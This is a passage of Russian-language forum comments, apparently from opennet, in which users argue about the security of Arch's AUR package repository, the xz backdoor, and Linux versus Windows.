    Никто ни за что не отвечает, тысячи пакетов, непонятные мейнтейнеры, про которых известен только их выдуманный email, никакой репутации или юридической ответственности - БЕЗОПАСНОСТЬ.

    Про xz, который был затроянен месяцами и попал в несколько листов, забыли.

    ЛОЛ.

     
     
  • 3.186, Аноним (185), 08:32, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Опеннет-истерички продолжают нагнетать.
     
     
  • 4.187, Anonimm (?), 08:43, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Нагнетать? В "безопасной" системе довольно долгое время жил бэкдор, который "тысячи глаз" заметили далеко не сразу.
    И ещё у вас, представителей 4%-сообщества есть привычка съезжать с темы при любом негативном упоминании, что ваша "безопасная" система является именно такой, безопасной в кавычках..
     
     
  • 5.191, Аноним (141), 09:47, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А кто пострадал от этого бэкдора?
    Сейчас у меня арч и я даже не знаю как поймать вирус. Из аура ставлю пару пакетов, у которых нормальный рейтинг от сообщества, в PKGBUILD не заглядывал. Даже подключил репо chaotic-aur, ставил игрушки оттуда.

    А когда пользовался виндой, много раз ловил вирусов-вымогателей, которые мне всё шифровали, благо у меня всегда были копии всех данных. Несколько раз помогал знакомым в подобных случаях. Хотя от винды отказался не по этой причине.

     
     
  • 6.195, Anonimm (?), 15:49, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Объясни - какая взаимосвязь между трояном в xz и виндой Это какой-то сюр Зачем... большой текст свёрнут, показать
     

  • 1.86, Аноним (86), 11:57, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!
    А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI.
    Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
     
     
  • 2.95, Пояснительная бригада (?), 12:17, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
     
     
  • 3.142, Аноним (140), 19:55, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
     
     
  • 4.182, Anonimm (?), 07:17, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Гениально! Проблема в очередной раз в лине, но 4%-ное сообщество при любом удобном случае поливает грязью другую систему..
     
     
  • 5.204, Аноним (199), 19:34, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    так-то обсуждается конкретный пакетный менеджер. которые разные в разных дистрибах. и при чём тут линь?
     
     
  • 6.207, Anonimm (?), 21:19, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А винда тут с какой стороны?
     
  • 3.165, Аноним (86), 21:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вы это написали к чему Намекаете что и так всё в порядке Про процент дисктопа ... большой текст свёрнут, показать
     
  • 2.220, Котофалк (?), 12:36, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!

    Проприетарный - не будет. Опенсорсному это и не надо, сборкой ПО под конкретный дистр занимаются мейнтейнеры оного дистра.

     

  • 1.93, Аноним (93), 12:13, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
     
     
  • 2.96, Пояснительная бригада (?), 12:23, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Aур использую чтоб качать 1 пакет, zapret.
     

  • 1.198, Аноним (198), 18:53, 03/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ждем, когда решат проверить crates.io.
     
     
  • 2.227, нах. (?), 16:22, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А как ты там что-то проверишь, оно ж на хрусте. write-only да и то ИИ понаписал.

     

  • 1.230, Аноним (230), 04:33, 06/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Я конечно на арче не сидел. Но по моему мнению очевидно что арч самый популярный дистрибутив, особенно после стим дека. По моему в будущем таких случаев будет много, ведь аудитория дистрибутива огромная
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру